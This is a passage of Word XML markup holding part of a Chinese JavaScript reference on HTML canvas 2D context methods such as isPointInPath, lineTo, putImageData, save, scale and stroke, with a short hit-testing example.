        <w:t>非同源</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>boolean isPointInPath(double x,y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果指定的点在当前路径的边缘之内或之上，</w:t>
      </w:r>
      <w:r>
        <w:t>isPointInPath()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>；否则返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。指定的点没有根据当前转换矩阵转换。</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>取值应该在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>canvas.width</w:t>
      </w:r>
      <w:r>
        <w:t>之间，</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>取值应该</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>canvas.height</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>isPointInPath()</w:t>
      </w:r>
      <w:r>
        <w:t>测试的是未转换的点，因为它的设计目的是做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>命中测试</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>hit-testing</w:t>
      </w:r>
      <w:r>
        <w:t>）：比如判断用户的鼠标单击是否在画布上当前路径描述的某个部分之上。为了实现</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>命中测试</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，鼠标坐标先要先从相对于窗口转换为相对于画布。如果屏幕上画布的尺寸和</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>height</w:t>
      </w:r>
      <w:r>
        <w:t>属性定义的不一样（比如可能设置了</w:t>
      </w:r>
      <w:r>
        <w:t>style.width</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>style.height</w:t>
      </w:r>
      <w:r>
        <w:t>），鼠标坐标还需要缩放到与画布坐标一致。下面这个函数是一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞对象的</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序的示例</w:t>
      </w:r>
      <w:r>
        <w:t>，它做了必要的转换以便鼠标坐标与画布坐标一致。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>标签的</w:t>
      </w:r>
      <w:r>
        <w:t>onclick</w:t>
      </w:r>
      <w:r>
        <w:t>处理程序，假设当前已定义一条路径</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function hittest(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var canvas=this;//</w:t>
      </w:r>
      <w:r>
        <w:t>在画布上下文中调用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var c=canvas.getContext("2d");//</w:t>
      </w:r>
      <w:r>
        <w:t>取得画布的绘图上下文</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>取得画布的尺寸与位置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var bb=canvas.getBoundingClientRect();//</w:t>
      </w:r>
      <w:r>
        <w:t>将鼠标事件的坐标转换为画布坐标</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var </w:t>
      </w:r>
      <w:r>
        <w:t>x=(event.clientX-bb.left)*(canvas.width/bb.width);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var y=(event.clientY-bb.top)*(canvas.height/bb.height);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果用户在指定路径上单击，将其填充</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(c.isPointInPath(x,y))c.fill();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void lineTo(double x,double y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>lineTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法在当前子路径中添加一条直线，直线从当前点开始，到</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>结束。这个方法返回后，当前点是</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>TextMetrics measureText(string text)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>measureText()</w:t>
      </w:r>
      <w:r>
        <w:t>测量在当前字体下指定</w:t>
      </w:r>
      <w:r>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>将占据多大的宽度，返回一个包含测量结果的</w:t>
      </w:r>
      <w:r>
        <w:t>TextMetrics</w:t>
      </w:r>
      <w:r>
        <w:t>对象。在写这本书的时候，返回对象只有一个</w:t>
      </w:r>
      <w:r>
        <w:t>width</w:t>
      </w:r>
      <w:r>
        <w:t>属性，文本的高度和边框都还没有测量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void moveTo(double x,double y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>moveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>将当前点设置为</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>，并以这个点作为第一个点，开始一条新的子路径。如果之前有一条子路径，并且这条子路径只包含一个点，那么这条空子路径将会从路径中移除。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void putImageData(ImageData imagedata,double dx,dy,[sx,sy,sw,sh])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>putImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法从一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象中复制一个矩形像素块到当前画布中。这是一个低级的像素复制操作：</w:t>
      </w:r>
      <w:r>
        <w:t>globalCompos</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>iteOperation</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>globalAlpha</w:t>
      </w:r>
      <w:r>
        <w:t>属性被忽略，同样被忽略的还有剪切区域、转换矩阵以及阴影绘制属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
      <w:r>
        <w:t>dx</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>dy</w:t>
      </w:r>
      <w:r>
        <w:t>定义画布上的目标点，</w:t>
      </w:r>
      <w:r>
        <w:t>data</w:t>
      </w:r>
      <w:r>
        <w:t>中的像素复制到画布中后会从这个点开始绘制。这两个参数不会被当前转换矩阵转换。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最后</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数定义</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个源矩形区域。如果指定，则只有这个矩形之内的像素才会复制到画布中。如果这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数省略，则</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>中的所有像素都会复制。如果这</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>个参数定义的矩形区域大于</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>的范围，则矩形区域会裁剪至这个范围。参数</w:t>
      </w:r>
      <w:r>
        <w:t>sx</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>sy</w:t>
      </w:r>
      <w:r>
        <w:t>的值可以为负数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>对象的用途之一是将它用做画布的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>备份存储器</w:t>
      </w:r>
      <w:r>
        <w:t>”——</w:t>
      </w:r>
      <w:r>
        <w:t>保存画布像素的一份副本到一个</w:t>
      </w:r>
      <w:r>
        <w:t>ImageData</w:t>
      </w:r>
      <w:r>
        <w:t>（使用</w:t>
      </w:r>
      <w:r>
        <w:t>getImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>）对象中，在画布上临时绘画，然后使用</w:t>
      </w:r>
      <w:r>
        <w:t>putImageData()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将它恢复到初</w:t>
      </w:r>
      <w:r>
        <w:t>始状态。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void quadraticCurveTo(double cpx,cpy,x,y)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法添加一条二次贝塞尔曲线段到当前子路径中。曲线从当前点开始，到</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>结束。控制点</w:t>
      </w:r>
      <w:r>
        <w:t>(cpX,cpY)</w:t>
      </w:r>
      <w:r>
        <w:t>指定起点与终点间的曲线的形状。（不过，贝塞尔曲线的数学知识超出了本书的范围。）</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法返回时，当前点为</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>。也可以参考</w:t>
      </w:r>
      <w:r>
        <w:t>bezierCurveTo()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void rect(double x,y,w,h)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法添加一个矩形到当前路径中。这个矩形在自己的子路径中，与当前路径的其他子路径都不相连。这个</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回时，当前点是</w:t>
      </w:r>
      <w:r>
        <w:t>(x,y)</w:t>
      </w:r>
      <w:r>
        <w:t>。这个方法与下面的调用序列等价：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.moveTo(x,y);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(x+w,y);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(x+w,y+h);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.lineTo(x,y+h);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>c.closePath();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void restore()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法从已保存的绘图状态的栈中弹出最后一个保存状态，并根据这个状态重置</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>的各项属性、裁剪路径以及转换矩阵。更多信息请参考</w:t>
      </w:r>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void rotate(double angle)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法</w:t>
      </w:r>
      <w:r>
        <w:t>改变当前转换矩阵，接下来这张画布上绘制的任何对象都将旋转指定的角度。＜</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素本身并没有旋转。注意角</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>度的单位是弧度制。角度转换为弧度的方法为：乘以</w:t>
      </w:r>
      <w:r>
        <w:t>Math.PI</w:t>
      </w:r>
      <w:r>
        <w:t>，再除以</w:t>
      </w:r>
      <w:r>
        <w:t>180</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void save()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>save()</w:t>
      </w:r>
      <w:r>
        <w:t>将复制当前绘图状态，并将这个副本压入已保存的绘图状态栈中。这样，就可以临时改变绘图状态，然后再调用</w:t>
      </w:r>
      <w:r>
        <w:t>restore()</w:t>
      </w:r>
      <w:r>
        <w:t>恢复到之前的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>画布的绘图状态包含</w:t>
      </w:r>
      <w:r>
        <w:t>CanvasRenderingContext2D</w:t>
      </w:r>
      <w:r>
        <w:t>对象的所有属性（除了只读的</w:t>
      </w:r>
      <w:r>
        <w:t>canvas</w:t>
      </w:r>
      <w:r>
        <w:t>属性）。它也包含由于调用</w:t>
      </w:r>
      <w:r>
        <w:t>rotate()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>scal</w:t>
      </w:r>
      <w:r>
        <w:t>e()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>会影响到的转换矩阵，以及由</w:t>
      </w:r>
      <w:r>
        <w:t>clip()</w:t>
      </w:r>
      <w:r>
        <w:t>方法定义的裁剪路径。但是，需要注意的是，当前路径与当前位置不是绘图状态的一部分，不会被这个方法保存。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void scale(double sx,double sy)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>添加一个缩放转换到画布的当前转换矩阵中。缩放在水平方向与垂直方向上是相互独立的。例如，传入参数</w:t>
      </w:r>
      <w:r>
        <w:t>2.0</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>0.5</w:t>
      </w:r>
      <w:r>
        <w:t>，在接下来的绘画中，路径的宽度将变成原来的两倍，高度变为原来的一半。如果参数</w:t>
      </w:r>
      <w:r>
        <w:t>s x</w:t>
      </w:r>
      <w:r>
        <w:t>为负数，</w:t>
      </w:r>
      <w:r>
        <w:t>X</w:t>
      </w:r>
      <w:r>
        <w:t>轴将水平翻转；如果参数</w:t>
      </w:r>
      <w:r>
        <w:t>s y</w:t>
      </w:r>
      <w:r>
        <w:t>为负数，</w:t>
      </w:r>
      <w:r>
        <w:t>Y</w:t>
      </w:r>
      <w:r>
        <w:t>轴将垂直翻转。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
      <w:r>
        <w:t>setTransform(double a,b,c,d,e,f)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>这个方法允许直接设置当前转换矩阵，而无须多次调用</w:t>
      </w:r>
      <w:r>
        <w:t>translate()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>scale()</w:t>
      </w:r>
      <w:r>
        <w:t>及</w:t>
      </w:r>
      <w:r>
        <w:t>rotate()</w:t>
      </w:r>
      <w:r>
        <w:t>。调用这个方法后，新的转换如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para06"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251751424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="line">
              <wp:align>top</wp:align>
            </wp:positionV>
            <wp:extent cx="1427671" cy="383875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="96" name="00096.jpeg" descr="000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6.jpeg" descr="00096.jpeg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId99"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1427671" cy="383875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void stroke()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>方法为当前路径描边。定义线条的几何形态的路径将会显现出来，但线条的视觉效果取决于</w:t>
      </w:r>
      <w:r>
        <w:t>strokeStyle</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>lineWidth</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>lineCap</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>lineJoin</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>miterLimit</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>术语描边（</w:t>
      </w:r>
      <w:r>
        <w:t>stroke</w:t>
      </w:r>
      <w:r>
        <w:t>）指钢笔或刷子描边，它的意思是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>绘制</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
      <w:r>
        <w:t>的外边线</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。与</w:t>
      </w:r>
      <w:r>
        <w:t>stroke()</w:t>
      </w:r>
      <w:r>
        <w:t>对应的是</w:t>
      </w:r>
      <w:r>
        <w:t>fill()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这个方法对路径的内部进行填充，而不是绘制它的外边线。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void strokeRect(double x,y,w,h)</w:t>
      </w:r>
    </w:p>
